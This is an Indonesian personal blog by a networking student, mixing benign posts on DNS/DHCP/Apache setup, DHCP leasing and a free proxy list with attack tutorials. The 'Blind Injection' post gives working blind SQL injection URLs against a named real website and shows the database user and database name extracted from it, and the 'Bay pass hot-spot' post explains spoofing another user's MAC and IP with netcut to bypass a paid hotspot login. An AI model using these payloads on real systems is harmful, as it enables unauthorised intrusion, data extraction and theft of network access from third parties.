Latest Entries »

-93

Filed under: UncategorizedLeave a comment
June 17, 2011

Comment

tkj3

Filed under: UncategorizedLeave a comment
June 17, 2011
Comment

Blind Injection

Filed under: UncategorizedLeave a comment
March 19, 2011

Blind Injection
posted by omicron9194
Blind Injection
2009-04-08 09:06:11
Blind Injection? Yup itu salah satu teknik attacker utk pentest web.gw akan jelasin sesimple mungkin ttg blind injection,yg kebanyakan “orang” menganggap ini rumit,termasuk gw
Stop! bukan bermaksud utk ngajarin,tapi gw berusaha memberikan apa yg gw punya meskipun masih sedikit.
Ok langsung aja kebanyakan pengantarnya
+Target

http://cmc.msc.com.my/event_detail.php?ID=190

+Test vulnerable
http://cmc.msc.com.my/event_detail.php?ID=190 and 1=1 <<< True
http://cmc.msc.com.my/event_detail.php?ID=190 and 1=2 <> dalam masalah ini,gw ga tau value ato nilai dari user itu apa, maka dalam “()” gw sengaja kosongkan
# 1,1 >>> urutan dari value tsb
# CHAR >>> peubah dalam desimal
# 65 >>> value desimal tsb dan 65 adalah “A” dalam ASCII jadi gw mengawalinya dengan “A” >> 65 dalam ASCII , bisa di awali dari apa aja,tapi utk lebih valid,gw mengawali dgn huruf “A” >>> 65
Setelah kita masukkan URL tadi,apa yg akan di tampilkan ? Yup,nilainya ada 2,True or False.
True >>> jika halamannya menampilkan dalam keadaan normal (berita,gambar,etc .. tidak hilang)
False >>> jika halamannya tidak menampilkan sebagian ato seluruh isi dari halaman tsb (berita,gambar,etc .. ada yg hilang)
http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(65) <<< false
http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(66) <<< false
http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(67) <>
http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,2)=char(67,65) <> R dalam ASCII
Lanjut sampe halaman tsb bernilai false dan akan mendapatkan :

http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(user(),1,10)=char(67,82,69,83,84,81,95,67,77,68)

67 = C
82 = R
69 = E
83 = S
84 = T
81 = Q
95 = _
67 = C
77 = M
68 = D
Nah itu “username” nya >>> CRESTQ_CMD
klo mw cari “password” nya >>> value user() ganti jadi >>> database() , dan dilakukan sama dengan cara di atas :

http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(database(),1,12)=char(67,82,69,83,84,81,95,67,77,68,68,66)

67 = C
82 = R
69 = E
83 = S
84 = T
81 = Q
95 = _
67 = C
77 = M
68 = D
68 = D
66 = B
Password yg di dapat >>> CRESTQ_CMDDB
“user” dan “password” >>> CRESTQ_CMD dan CRESTQ_CMDDB
yg gw dapatkan itu belum tentu user dan password.Tergantung databasenya.
Jadi ga selalu user() >> user
password()>> password,dll
Ternyata ga serumit yg gw bayangkan,tapi, harus ada waktu panjang utk blind injection ini,sabar aja ok

Comment

Free Proxy

Filed under: UncategorizedLeave a comment
March 19, 2011

Free Proxy
posted by omicron9194
Free Proxy
2009-09-06 10:56:27
Dibawah ini adalah daftar Proxy dan Port yang kemungkinan masih bisa dipakai:
. Free HTTP proxies :
+——————–+————+
: IP : Port :
+——————–+————+
: 200.121.169.218 : 3128 :
: 200.117.229.129 : 3128 :
: 69.243.121.55 : 3382 :
: 155.98.35.3 : 3128 :
: 200.114.158.156 : 3128 :
: 155.98.35.3 : 3127 :
: 200.111.55.10 : 3128 :
: 128.101.191.244 : 3127 :
: 200.108.136.10 : 3128 :
: 200.107.8.158 : 3128 :
+———————————+
. Free Anonymous HTTP proxies:
+——————–+————+
: IP : Port :
+——————–+————+
: 200.114.158.156 : 3128 :
: 205.150.199.114 : 8080 :
: 82.112.196.50 : 8080 :
+———————————+
. Free 100% Elite Anonymous HTTP proxies :
+——————–+————+
: IP : Port :
+——————–+————+
: 69.243.121.55 : 3382 :
: 155.98.35.3 : 3128 :
: 155.98.35.3 : 3127 :
+———————————+
. Free HTTPS Proxy :
+——————–+————+
: IP : Port :
+——————–+————+
: 200.206.142.86 : 6588 :
: 69.243.121.55 : 3382 :
+———————————+
. Free SOCKS 4 proxy :
+——————–+————+
: IP : Port :
+——————–+————+
: 200.109.36.36 : 1080 :
: 200.105.242.142 : 1080 :
: 200.104.32.27 : 1080 :
: 70.185.79.234 : 18844 :
: 70.185.79.234 : 18844 :
+———————————+
. Free SOCKS 5 proxy :
+——————–+————+
: IP : Port :
+——————–+————+
: 200.109.36.36 : 1080 :
: 200.105.242.142 : 1080 :
: 200.104.32.27 : 1080 :
: 70.185.79.234 : 18844 :
: 70.185.79.234 : 18844 :
+———————————+

Comment

PROSES PENEYEWAAN ALAMAT IP SECARATEKHNIS

Filed under: UncategorizedLeave a comment
March 14, 2011

1.Client mengrimkan broadcast dhcpdiskover untuk mencari dhcp server
2.Dhcp server mengirimkan dhcp-fopper untuk mencari dhcp-server
3.Client yang menerima penawaran ip akan mengirimkan dhcp-request kepada dhcp-server
4.Proses yang terakhir adalah dhcp-server mengirimkn dhppack…

Terima kasish …klo ada yang slah sya mohon maaf…atau bisa mengirmkan pesan/komentar

Comment

Tentang saya

Filed under: UncategorizedLeave a comment
March 9, 2011

Pekerjaan : Pelajar SMK N 1 CIJULANG Teknik computer&jaringan
Minat : Pengen jadi Programer
Visi & Misi Hidup
Visi
Ingin Membangun jaringan berbasis linux dan membudayakan sifat FREE
Misi
Ingin Jadi konsultan pengembangan dan design website serta keamanannya
Ingin membuat situs jarring sosial
Ingin melanjutkan kuliah ke ITB
Ingin punya perusahaan yang cabang-cabangnya ada diseluruh dunia
Ingin membuat software untuk keamanan jaringan
Ingin membuat sekolah swasta Yang berbasis Teknologi
Ingin mendirikan sekolah, buat anak-anak yang putus sekolah/tidak melanjutkan
Ingin mewadahi kelompok hacker dan tentu saja yang beretika
Ingin membuat forum untuk pengembangan linux
Itulah Target saya…dan saya yakin akan mewujudkannya ,saya optimis dengan cita-cita saya dan keterbatasan yang saya milki,dan jika hal tersebut tidak terwujud ,saya tidak akan menangis,karena minimal saya telah mencoba..! dan apakah anda begitu..? :-)

Terima Kasih
Comment

Install Dns+Dhcp+apache di linux 9.04

Filed under: UncategorizedLeave a comment
March 7, 2011

Emz …kalian pasti udah tau maksud saya…yupz benar instalasi dns..sebenarnya dns itu apa…??dns tuh buat keperluan translate dari ip ke host name dan sebaliknya..terus dhcp apa..?dhcp adalah dynamic host configuration,,klo dijelasin secara singkat sih..yaitu,:untuk memberikan ip addres kepada client secara otomatis,,klo apche apa?apche adalah nama webserver yang bertanggung  jawab pada request-respon

Langsung aja jangan banyak basa-basi…yang pertama dijalankan adlah dns,,,saya sih gak usah nginstal lagi paketnnya karena udah ada ,,/udah diinstallin waktu saya nginstal osnya..gitu jadi langsung ketikan perintah

cd /etc/bind kemudian enter

lalu buat file databasenya

cp db. local db.ahmadservertkj

kemudian editlah

setelah diedit copykan kembali db kamu,,untuk membuat file resolver

cp db.ahamdservertkj db.192 enter

oke masalah namanya sih gak masalah jangan diributin terserah kamu aja,,,nama file databasenya dan resolver..

lalu instalkan dhcp3-server dengan perintah apt-get install dhcp3-server enter

lalu edit file di nano /etc/default/dhcp3-server

setelah itu edit file lagi di

nano /etc/dhcp3/dhcpd.conf

klo udah restart

/etc/init.d/dhcp3-server restart

setelah itu instalkan apachenya

apt-get install apache2

gitu aja ,,,sory gak pake gambar soalanay saya buru-buru :-)

Comment

Bay pass hot-spot

Filed under: UncategorizedLeave a comment
February 11, 2011

Saya tuh heran karena hot spot diskol saya pake password,,saya cari seribu car buat jebol hotspot,,bukan dirusak tapi saya pengen login tanpa user id dan password,,,hehe saya tuh pengen browsing tanpa harus login dulu dan akhirnya saya temukan cara hebat dan cukup memuaskan :-) saya temukan program netcut 2.0 saya pikir cuma buat putuskan saluran koneksi /bandwitch orang lain,,tapi ternyata bisa juga bwt untuk bay pas hotspot,maksudnya kita browsing pake wireles tapi gak usah login dulu,,,oke download dulu net,cutnya…setelah anda download insstal kan program tersebut

setelah diinstall coba kamu buka netcutnya   cek langsung pilih choice net cut

Nah disana pasti ada banyak komputer yang koneksi ke wireles termasuk yang punya kamu setelah itu kamu pilih salah satu computer untuk meminjam /alis nyuri ipnya bentar ko?? klik salah satu komputer misal dewa19 pokonya hostnya gitu,,klik disana lalu  pilih print tabel

nah setelah itu copykan angka yang ada,,misal gini loh ,,nilai itu buat ngisi mac addres kita misala pas diprint tabel komputer yang akan dipinjem ipnya/hehe,,,dewa19 terus entar disana ada huruf/angka kayak gini misalnya,,[02:00:ff:0p:] itu misal nya terus anada hilangkan tanda : dan tanda [] oke,,,setelah itu copy atau catat aja di tangan anada pake bolpoint heheh

setelah itu lanjut buka koneksi wireles disable kan duluyah ,,atur nilai mac addresnya isikan nilai yang tadi di copykan,,

klo udah atur ipnya pake yang punya tuh computer tadi,,,isikan ip terus gateway,,pokonya isi semua yang ada terus klo udah selesai wireles lo aktifin lagi

nah sekaranga ada jendela bwt login tuh klik aja langsung gambar home …maka jreng langsung abang google anada bisa lihat..sebenarnya ada kegunaan bukan itu saja sih ,,bisa juga buat ancurin hidup seseorang contohnya motong koneksi yang lagi browsing gituhh..kayaknya kata2 saya berbelit belit deh perasaan B-)

trims mudah2 han anda bisa langsung berbuat jahat hhehehe bercanda

Comment
Follow

Get every new post delivered to your Inbox.